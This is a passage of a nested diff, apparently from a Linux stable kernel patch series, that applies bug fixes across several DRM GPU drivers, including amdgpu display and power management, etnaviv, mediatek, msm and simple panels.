++								   PCI_EXP_LNKCTL_HAWD,
++								   bridge_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
++				pcie_capability_clear_and_set_word(adev->pdev, PCI_EXP_LNKCTL,
++								   PCI_EXP_LNKCTL_HAWD,
++								   gpu_cfg &
++								   PCI_EXP_LNKCTL_HAWD);
+ 
+ 				pcie_capability_read_word(root, PCI_EXP_LNKCTL2,
+ 							  &tmp16);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 249b269e2cc53..c8e562dcd99d0 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -5921,8 +5921,7 @@ create_stream_for_sink(struct amdgpu_dm_connector *aconnector,
+ 		 */
+ 		DRM_DEBUG_DRIVER("No preferred mode found\n");
+ 	} else {
+-		recalculate_timing = amdgpu_freesync_vid_mode &&
+-				 is_freesync_video_mode(&mode, aconnector);
++		recalculate_timing = is_freesync_video_mode(&mode, aconnector);
+ 		if (recalculate_timing) {
+ 			freesync_mode = get_highest_refresh_rate_mode(aconnector, false);
+ 			drm_mode_copy(&saved_mode, &mode);
+@@ -7016,7 +7015,7 @@ static void amdgpu_dm_connector_add_freesync_modes(struct drm_connector *connect
+ 	struct amdgpu_dm_connector *amdgpu_dm_connector =
+ 		to_amdgpu_dm_connector(connector);
+ 
+-	if (!(amdgpu_freesync_vid_mode && edid))
++	if (!edid)
+ 		return;
+ 
+ 	if (amdgpu_dm_connector->max_vfreq - amdgpu_dm_connector->min_vfreq > 10)
+@@ -7859,10 +7858,12 @@ static void amdgpu_dm_commit_planes(struct drm_atomic_state *state,
+ 		 * fast updates.
+ 		 */
+ 		if (crtc->state->async_flip &&
+-		    acrtc_state->update_type != UPDATE_TYPE_FAST)
++		    (acrtc_state->update_type != UPDATE_TYPE_FAST ||
++		     get_mem_type(old_plane_state->fb) != get_mem_type(fb)))
+ 			drm_warn_once(state->dev,
+ 				      "[PLANE:%d:%s] async flip with non-fast update\n",
+ 				      plane->base.id, plane->name);
++
+ 		bundle->flip_addrs[planes_count].flip_immediate =
+ 			crtc->state->async_flip &&
+ 			acrtc_state->update_type == UPDATE_TYPE_FAST &&
+@@ -9022,8 +9023,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		 * TODO: Refactor this function to allow this check to work
+ 		 * in all conditions.
+ 		 */
+-		if (amdgpu_freesync_vid_mode &&
+-		    dm_new_crtc_state->stream &&
++		if (dm_new_crtc_state->stream &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state, old_crtc_state))
+ 			goto skip_modeset;
+ 
+@@ -9063,7 +9063,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 		}
+ 
+ 		/* Now check if we should set freesync video mode */
+-		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
++		if (dm_new_crtc_state->stream &&
+ 		    dc_is_stream_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    dc_is_stream_scaling_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+@@ -9076,7 +9076,7 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 			set_freesync_fixed_config(dm_new_crtc_state);
+ 
+ 			goto skip_modeset;
+-		} else if (amdgpu_freesync_vid_mode && aconnector &&
++		} else if (aconnector &&
+ 			   is_freesync_video_mode(&new_crtc_state->mode,
+ 						  aconnector)) {
+ 			struct drm_display_mode *high_mode;
+@@ -9815,6 +9815,11 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 
+ 	/* Remove exiting planes if they are modified */
+ 	for_each_oldnew_plane_in_state_reverse(state, plane, old_plane_state, new_plane_state, i) {
++		if (old_plane_state->fb && new_plane_state->fb &&
++		    get_mem_type(old_plane_state->fb) !=
++		    get_mem_type(new_plane_state->fb))
++			lock_and_validation_needed = true;
++
+ 		ret = dm_update_plane_state(dc, state, plane,
+ 					    old_plane_state,
+ 					    new_plane_state,
+@@ -10066,9 +10071,20 @@ static int amdgpu_dm_atomic_check(struct drm_device *dev,
+ 		struct dm_crtc_state *dm_new_crtc_state =
+ 			to_dm_crtc_state(new_crtc_state);
+ 
++		/*
++		 * Only allow async flips for fast updates that don't change
++		 * the FB pitch, the DCC state, rotation, etc.
++		 */
++		if (new_crtc_state->async_flip && lock_and_validation_needed) {
++			drm_dbg_atomic(crtc->dev,
++				       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
++				       crtc->base.id, crtc->name);
++			ret = -EINVAL;
++			goto fail;
++		}
++
+ 		dm_new_crtc_state->update_type = lock_and_validation_needed ?
+-							 UPDATE_TYPE_FULL :
+-							 UPDATE_TYPE_FAST;
++			UPDATE_TYPE_FULL : UPDATE_TYPE_FAST;
+ 	}
+ 
+ 	/* Must be success */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index b9b70f4562c72..1ec643a0d00d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -406,18 +406,6 @@ static int dm_crtc_helper_atomic_check(struct drm_crtc *crtc,
+ 		return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * Only allow async flips for fast updates that don't change the FB
+-	 * pitch, the DCC state, rotation, etc.
+-	 */
+-	if (crtc_state->async_flip &&
+-	    dm_crtc_state->update_type != UPDATE_TYPE_FAST) {
+-		drm_dbg_atomic(crtc->dev,
+-			       "[CRTC:%d:%s] async flips are only supported for fast updates\n",
+-			       crtc->base.id, crtc->name);
+-		return -EINVAL;
+-	}
+-
+ 	/* In some use cases, like reset, no stream is attached */
+ 	if (!dm_crtc_state->stream)
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
+index 925d6e13620ec..1bbf85defd611 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_smu.c
+@@ -32,6 +32,7 @@
+ 
+ #define MAX_INSTANCE                                        6
+ #define MAX_SEGMENT                                         6
++#define SMU_REGISTER_WRITE_RETRY_COUNT                      5
+ 
+ struct IP_BASE_INSTANCE
+ {
+@@ -134,6 +135,8 @@ static int dcn315_smu_send_msg_with_param(
+ 		unsigned int msg_id, unsigned int param)
+ {
+ 	uint32_t result;
++	uint32_t i = 0;
++	uint32_t read_back_data;
+ 
+ 	result = dcn315_smu_wait_for_response(clk_mgr, 10, 200000);
+ 
+@@ -150,10 +153,19 @@ static int dcn315_smu_send_msg_with_param(
+ 	/* Set the parameter register for the SMU message, unit is Mhz */
+ 	REG_WRITE(MP1_SMN_C2PMSG_37, param);
+ 
+-	/* Trigger the message transaction by writing the message ID */
+-	generic_write_indirect_reg(CTX,
+-		REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
+-		mmMP1_C2PMSG_3, msg_id);
++	for (i = 0; i < SMU_REGISTER_WRITE_RETRY_COUNT; i++) {
++		/* Trigger the message transaction by writing the message ID */
++		generic_write_indirect_reg(CTX,
++			REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
++			mmMP1_C2PMSG_3, msg_id);
++		read_back_data = generic_read_indirect_reg(CTX,
++			REG_NBIO(RSMU_INDEX), REG_NBIO(RSMU_DATA),
++			mmMP1_C2PMSG_3);
++		if (read_back_data == msg_id)
++			break;
++		udelay(2);
++		smu_print("SMU msg id write fail %x times. \n", i + 1);
++	}
+ 
+ 	result = dcn315_smu_wait_for_response(clk_mgr, 10, 200000);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+index d260eaa1509ed..9378c98d02cfe 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+@@ -1813,10 +1813,13 @@ void dce110_enable_accelerated_mode(struct dc *dc, struct dc_state *context)
+ 			hws->funcs.edp_backlight_control(edp_link_with_sink, false);
+ 		}
+ 		/*resume from S3, no vbios posting, no need to power down again*/
++		clk_mgr_exit_optimized_pwr_state(dc, dc->clk_mgr);
++
+ 		power_down_all_hw_blocks(dc);
+ 		disable_vga_and_power_gate_all_controllers(dc);
+ 		if (edp_link_with_sink && !keep_edp_vdd_on)
+ 			dc->hwss.edp_power_control(edp_link_with_sink, false);
++		clk_mgr_optimize_pwr_state(dc, dc->clk_mgr);
+ 	}
+ 	bios_set_scratch_acc_mode_change(dc->ctx->dc_bios, 1);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
+index 6192851c59ed8..51265a812bdc8 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_init.c
+@@ -75,6 +75,7 @@ static const struct hw_sequencer_funcs dcn301_funcs = {
+ 	.get_hw_state = dcn10_get_hw_state,
+ 	.clear_status_bits = dcn10_clear_status_bits,
+ 	.wait_for_mpcc_disconnect = dcn10_wait_for_mpcc_disconnect,
++	.edp_backlight_control = dce110_edp_backlight_control,
+ 	.edp_power_control = dce110_edp_power_control,
+ 	.edp_wait_for_hpd_ready = dce110_edp_wait_for_hpd_ready,
+ 	.set_cursor_position = dcn10_set_cursor_position,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+index cef32a1f91cdc..b735e548e26dc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_dccg.c
+@@ -84,7 +84,8 @@ static enum phyd32clk_clock_source get_phy_mux_symclk(
+ 		struct dcn_dccg *dccg_dcn,
+ 		enum phyd32clk_clock_source src)
+ {
+-	if (dccg_dcn->base.ctx->asic_id.hw_internal_rev == YELLOW_CARP_B0) {
++	if (dccg_dcn->base.ctx->asic_id.chip_family == FAMILY_YELLOW_CARP &&
++			dccg_dcn->base.ctx->asic_id.hw_internal_rev == YELLOW_CARP_B0) {
+ 		if (src == PHYD32CLKC)
+ 			src = PHYD32CLKF;
+ 		if (src == PHYD32CLKD)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 8a88605827a84..551a63f7064bb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -32,7 +32,7 @@
+ #include "dml/display_mode_vba.h"
+ 
+ struct _vcs_dpi_ip_params_st dcn3_14_ip = {
+-	.VBlankNomDefaultUS = 800,
++	.VBlankNomDefaultUS = 668,
+ 	.gpuvm_enable = 1,
+ 	.gpuvm_max_page_table_levels = 1,
+ 	.hostvm_enable = 1,
+diff --git a/drivers/gpu/drm/amd/pm/amdgpu_pm.c b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+index 7d613118cb713..8472013ff38a2 100644
+--- a/drivers/gpu/drm/amd/pm/amdgpu_pm.c
++++ b/drivers/gpu/drm/amd/pm/amdgpu_pm.c
+@@ -2072,15 +2072,19 @@ static int amdgpu_device_attr_create(struct amdgpu_device *adev,
+ 				     uint32_t mask, struct list_head *attr_list)
+ {
+ 	int ret = 0;
+-	struct device_attribute *dev_attr = &attr->dev_attr;
+-	const char *name = dev_attr->attr.name;
+ 	enum amdgpu_device_attr_states attr_states = ATTR_STATE_SUPPORTED;
+ 	struct amdgpu_device_attr_entry *attr_entry;
++	struct device_attribute *dev_attr;
++	const char *name;
+ 
+ 	int (*attr_update)(struct amdgpu_device *adev, struct amdgpu_device_attr *attr,
+ 			   uint32_t mask, enum amdgpu_device_attr_states *states) = default_attr_update;
+ 
+-	BUG_ON(!attr);
++	if (!attr)
++		return -EINVAL;
++
++	dev_attr = &attr->dev_attr;
++	name = dev_attr->attr.name;
+ 
+ 	attr_update = attr->attr_update ? attr->attr_update : default_attr_update;
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index f7ac488a3da20..503e844baede2 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1305,7 +1305,7 @@ static ssize_t smu_v13_0_0_get_gpu_metrics(struct smu_context *smu,
+ 	gpu_metrics->average_vclk1_frequency = metrics->AverageVclk1Frequency;
+ 	gpu_metrics->average_dclk1_frequency = metrics->AverageDclk1Frequency;
+ 
+-	gpu_metrics->current_gfxclk = metrics->CurrClock[PPCLK_GFXCLK];
++	gpu_metrics->current_gfxclk = gpu_metrics->average_gfxclk_frequency;
+ 	gpu_metrics->current_socclk = metrics->CurrClock[PPCLK_SOCCLK];
+ 	gpu_metrics->current_uclk = metrics->CurrClock[PPCLK_UCLK];
+ 	gpu_metrics->current_vclk0 = metrics->CurrClock[PPCLK_VCLK_0];
+diff --git a/drivers/gpu/drm/armada/armada_overlay.c b/drivers/gpu/drm/armada/armada_overlay.c
+index f21eb8fb76d87..3b9bd8ecda137 100644
+--- a/drivers/gpu/drm/armada/armada_overlay.c
++++ b/drivers/gpu/drm/armada/armada_overlay.c
+@@ -4,6 +4,8 @@
+  *  Rewritten from the dovefb driver, and Armada510 manuals.
+  */
+ 
++#include <linux/bitfield.h>
++
+ #include <drm/armada_drm.h>
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -445,8 +447,8 @@ static int armada_overlay_get_property(struct drm_plane *plane,
+ 			     drm_to_overlay_state(state)->colorkey_ug,
+ 			     drm_to_overlay_state(state)->colorkey_vb, 0);
+ 	} else if (property == priv->colorkey_mode_prop) {
+-		*val = (drm_to_overlay_state(state)->colorkey_mode &
+-			CFG_CKMODE_MASK) >> ffs(CFG_CKMODE_MASK);
++		*val = FIELD_GET(CFG_CKMODE_MASK,
++				 drm_to_overlay_state(state)->colorkey_mode);
+ 	} else if (property == priv->brightness_prop) {
+ 		*val = drm_to_overlay_state(state)->brightness + 256;
+ 	} else if (property == priv->contrast_prop) {
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+index 78b72739e5c3e..9f9874acfb2b7 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7511_drv.c
+@@ -786,8 +786,13 @@ static void adv7511_mode_set(struct adv7511 *adv7511,
+ 	else
+ 		low_refresh_rate = ADV7511_LOW_REFRESH_RATE_NONE;
+ 
+-	regmap_update_bits(adv7511->regmap, 0xfb,
+-		0x6, low_refresh_rate << 1);
++	if (adv7511->type == ADV7511)
++		regmap_update_bits(adv7511->regmap, 0xfb,
++				   0x6, low_refresh_rate << 1);
++	else
++		regmap_update_bits(adv7511->regmap, 0x4a,
++				   0xc, low_refresh_rate << 2);
++
+ 	regmap_update_bits(adv7511->regmap, 0x17,
+ 		0x60, (vsync_polarity << 6) | (hsync_polarity << 5));
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 213263ad6a064..cf86cc05b7fca 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -874,11 +874,11 @@ static int anx7625_hdcp_enable(struct anx7625_data *ctx)
+ 	}
+ 
+ 	/* Read downstream capability */
+-	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_READ, 0x68028, 1, &bcap);
++	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_READ, DP_AUX_HDCP_BCAPS, 1, &bcap);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (!(bcap & 0x01)) {
++	if (!(bcap & DP_BCAPS_HDCP_CAPABLE)) {
+ 		pr_warn("downstream not support HDCP 1.4, cap(%x).\n", bcap);
+ 		return 0;
+ 	}
+@@ -933,8 +933,8 @@ static void anx7625_dp_start(struct anx7625_data *ctx)
+ 
+ 	dev_dbg(dev, "set downstream sink into normal\n");
+ 	/* Downstream sink enter into normal mode */
+-	data = 1;
+-	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, 0x000600, 1, &data);
++	data = DP_SET_POWER_D0;
++	ret = anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, DP_SET_POWER, 1, &data);
+ 	if (ret < 0)
+ 		dev_err(dev, "IO error : set sink into normal mode fail\n");
+ 
+@@ -973,8 +973,8 @@ static void anx7625_dp_stop(struct anx7625_data *ctx)
+ 
+ 	dev_dbg(dev, "notify downstream enter into standby\n");
+ 	/* Downstream monitor enter into standby mode */
+-	data = 2;
+-	ret |= anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, 0x000600, 1, &data);
++	data = DP_SET_POWER_D3;
++	ret |= anx7625_aux_trans(ctx, DP_AUX_NATIVE_WRITE, DP_SET_POWER, 1, &data);
+ 	if (ret < 0)
+ 		DRM_DEV_ERROR(dev, "IO error : mute video fail\n");
+ 
+diff --git a/drivers/gpu/drm/bridge/tc358764.c b/drivers/gpu/drm/bridge/tc358764.c
+index 53259c12d7778..e0f583a88789d 100644
+--- a/drivers/gpu/drm/bridge/tc358764.c
++++ b/drivers/gpu/drm/bridge/tc358764.c
+@@ -176,7 +176,7 @@ static void tc358764_read(struct tc358764 *ctx, u16 addr, u32 *val)
+ 	if (ret >= 0)
+ 		le32_to_cpus(val);
+ 
+-	dev_dbg(ctx->dev, "read: %d, addr: %d\n", addr, *val);
++	dev_dbg(ctx->dev, "read: addr=0x%04x data=0x%08x\n", addr, *val);
+ }
+ 
+ static void tc358764_write(struct tc358764 *ctx, u16 addr, u32 val)
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_dump.c b/drivers/gpu/drm/etnaviv/etnaviv_dump.c
+index f418e0b75772e..0edcf8ceb4a78 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_dump.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_dump.c
+@@ -125,9 +125,9 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 		return;
+ 	etnaviv_dump_core = false;
+ 
+-	mutex_lock(&gpu->mmu_context->lock);
++	mutex_lock(&submit->mmu_context->lock);
+ 
+-	mmu_size = etnaviv_iommu_dump_size(gpu->mmu_context);
++	mmu_size = etnaviv_iommu_dump_size(submit->mmu_context);
+ 
+ 	/* We always dump registers, mmu, ring, hanging cmdbuf and end marker */
+ 	n_obj = 5;
+@@ -157,7 +157,7 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 	iter.start = __vmalloc(file_size, GFP_KERNEL | __GFP_NOWARN |
+ 			__GFP_NORETRY);
+ 	if (!iter.start) {
+-		mutex_unlock(&gpu->mmu_context->lock);
++		mutex_unlock(&submit->mmu_context->lock);
+ 		dev_warn(gpu->dev, "failed to allocate devcoredump file\n");
+ 		return;
+ 	}
+@@ -169,18 +169,18 @@ void etnaviv_core_dump(struct etnaviv_gem_submit *submit)
+ 	memset(iter.hdr, 0, iter.data - iter.start);
+ 
+ 	etnaviv_core_dump_registers(&iter, gpu);
+-	etnaviv_core_dump_mmu(&iter, gpu->mmu_context, mmu_size);
++	etnaviv_core_dump_mmu(&iter, submit->mmu_context, mmu_size);
+ 	etnaviv_core_dump_mem(&iter, ETDUMP_BUF_RING, gpu->buffer.vaddr,
+ 			      gpu->buffer.size,
+ 			      etnaviv_cmdbuf_get_va(&gpu->buffer,
+-					&gpu->mmu_context->cmdbuf_mapping));
++					&submit->mmu_context->cmdbuf_mapping));
+ 
+ 	etnaviv_core_dump_mem(&iter, ETDUMP_BUF_CMD,
+ 			      submit->cmdbuf.vaddr, submit->cmdbuf.size,
+ 			      etnaviv_cmdbuf_get_va(&submit->cmdbuf,
+-					&gpu->mmu_context->cmdbuf_mapping));
++					&submit->mmu_context->cmdbuf_mapping));
+ 
+-	mutex_unlock(&gpu->mmu_context->lock);
++	mutex_unlock(&submit->mmu_context->lock);
+ 
+ 	/* Reserve space for the bomap */
+ 	if (n_bomap_pages) {
+diff --git a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+index 29ee0814bccc8..68050409dd26c 100644
+--- a/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
++++ b/drivers/gpu/drm/hyperv/hyperv_drm_drv.c
+@@ -7,6 +7,7 @@
+ #include <linux/hyperv.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
++#include <linux/screen_info.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 007af69e5026f..4c249939a6c3b 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -1588,7 +1588,9 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 	u8 val;
+ 	ssize_t ret;
+ 
+-	drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
++	ret = drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
++	if (ret < 0)
++		return ret;
+ 
+ 	if (drm_dp_tps4_supported(mtk_dp->rx_cap))
+ 		mtk_dp->train_info.channel_eq_pattern = DP_TRAINING_PATTERN_4;
+@@ -1615,10 +1617,13 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 			return ret == 0 ? -EIO : ret;
+ 		}
+ 
+-		if (val)
+-			drm_dp_dpcd_writeb(&mtk_dp->aux,
+-					   DP_DEVICE_SERVICE_IRQ_VECTOR_ESI0,
+-					   val);
++		if (val) {
++			ret = drm_dp_dpcd_writeb(&mtk_dp->aux,
++						 DP_DEVICE_SERVICE_IRQ_VECTOR_ESI0,
++						 val);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 5071f1263216b..14ddfe3a6be77 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -115,10 +115,9 @@ static int mtk_drm_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *
+ 	dma_addr_t dma_addr;
+ 
+ 	pkt->va_base = kzalloc(size, GFP_KERNEL);
+-	if (!pkt->va_base) {
+-		kfree(pkt);
++	if (!pkt->va_base)
+ 		return -ENOMEM;
+-	}
++
+ 	pkt->buf_size = size;
+ 	pkt->cl = (void *)client;
+ 
+@@ -128,7 +127,6 @@ static int mtk_drm_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *
+ 	if (dma_mapping_error(dev, dma_addr)) {
+ 		dev_err(dev, "dma map failed, size=%u\n", (u32)(u64)size);
+ 		kfree(pkt->va_base);
+-		kfree(pkt);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -144,7 +142,6 @@ static void mtk_drm_cmdq_pkt_destroy(struct cmdq_pkt *pkt)
+ 	dma_unmap_single(client->chan->mbox->dev, pkt->pa_base, pkt->buf_size,
+ 			 DMA_TO_DEVICE);
+ 	kfree(pkt->va_base);
+-	kfree(pkt);
+ }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 6c204ccfb9ece..1d0374a577a5e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -242,7 +242,11 @@ int mtk_drm_gem_prime_vmap(struct drm_gem_object *obj, struct iosys_map *map)
+ 
+ 	mtk_gem->kvaddr = vmap(mtk_gem->pages, npages, VM_MAP,
+ 			       pgprot_writecombine(PAGE_KERNEL));
+-
++	if (!mtk_gem->kvaddr) {
++		kfree(sgt);
++		kfree(mtk_gem->pages);
++		return -ENOMEM;
++	}
+ out:
+ 	kfree(sgt);
+ 	iosys_map_set_vaddr(map, mtk_gem->kvaddr);
+diff --git a/drivers/gpu/drm/msm/adreno/a2xx_gpu.c b/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
+index 6c9a747eb4ad5..2428d6ac5fe96 100644
+--- a/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a2xx_gpu.c
+@@ -521,6 +521,10 @@ struct msm_gpu *a2xx_gpu_init(struct drm_device *dev)
+ 	gpu->perfcntrs = perfcntrs;
+ 	gpu->num_perfcntrs = ARRAY_SIZE(perfcntrs);
+ 
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 1);
++	if (ret)
++		goto fail;
++
+ 	if (adreno_is_a20x(adreno_gpu))
+ 		adreno_gpu->registers = a200_registers;
+ 	else if (adreno_is_a225(adreno_gpu))
+@@ -528,10 +532,6 @@ struct msm_gpu *a2xx_gpu_init(struct drm_device *dev)
+ 	else
+ 		adreno_gpu->registers = a220_registers;
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 1);
+-	if (ret)
+-		goto fail;
+-
+ 	if (!gpu->aspace) {
+ 		dev_err(dev->dev, "No memory protection without MMU\n");
+ 		if (!allow_vram_carveout) {
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 62f6ff6abf410..42c7e378d504d 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -460,7 +460,8 @@ static int dpu_encoder_phys_wb_wait_for_commit_done(
+ 	wait_info.atomic_cnt = &phys_enc->pending_kickoff_cnt;
+ 	wait_info.timeout_ms = KICKOFF_TIMEOUT_MS;
+ 
+-	ret = dpu_encoder_helper_wait_for_irq(phys_enc, INTR_IDX_WB_DONE,
++	ret = dpu_encoder_helper_wait_for_irq(phys_enc,
++			phys_enc->irq[INTR_IDX_WB_DONE],
+ 			dpu_encoder_phys_wb_done_irq, &wait_info);
+ 	if (ret == -ETIMEDOUT)
+ 		_dpu_encoder_phys_wb_handle_wbdone_timeout(phys_enc);
+diff --git a/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c b/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
+index bd2c4ac456017..0d5ff03cb0910 100644
+--- a/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
++++ b/drivers/gpu/drm/msm/disp/mdp5/mdp5_plane.c
+@@ -130,8 +130,7 @@ static void mdp5_plane_destroy_state(struct drm_plane *plane,
+ {
+ 	struct mdp5_plane_state *pstate = to_mdp5_plane_state(state);
+ 
+-	if (state->fb)
+-		drm_framebuffer_put(state->fb);
++	__drm_atomic_helper_plane_destroy_state(state);
+ 
+ 	kfree(pstate);
+ }
+diff --git a/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c b/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
+index acfe1b31e0792..add72bbc28b17 100644
+--- a/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
++++ b/drivers/gpu/drm/msm/disp/msm_disp_snapshot_util.c
+@@ -192,5 +192,5 @@ void msm_disp_snapshot_add_block(struct msm_disp_state *disp_state, u32 len,
+ 	new_blk->base_addr = base_addr;
+ 
+ 	msm_disp_state_dump_regs(&new_blk->state, new_blk->size, base_addr);
+-	list_add(&new_blk->node, &disp_state->blocks);
++	list_add_tail(&new_blk->node, &disp_state->blocks);
+ }
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 5e067ba7e5fba..0e8622ccd3a0f 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -1159,7 +1159,9 @@ static const struct panel_desc auo_t215hvn01 = {
+ 	.delay = {
+ 		.disable = 5,
+ 		.unprepare = 1000,
+-	}
++	},
++	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
++	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+ static const struct drm_display_mode avic_tm070ddh03_mode = {
+diff --git a/drivers/gpu/drm/radeon/cik.c b/drivers/gpu/drm/radeon/cik.c
+index 5819737c21c67..a6f3c811ceb8e 100644
+--- a/drivers/gpu/drm/radeon/cik.c
++++ b/drivers/gpu/drm/radeon/cik.c
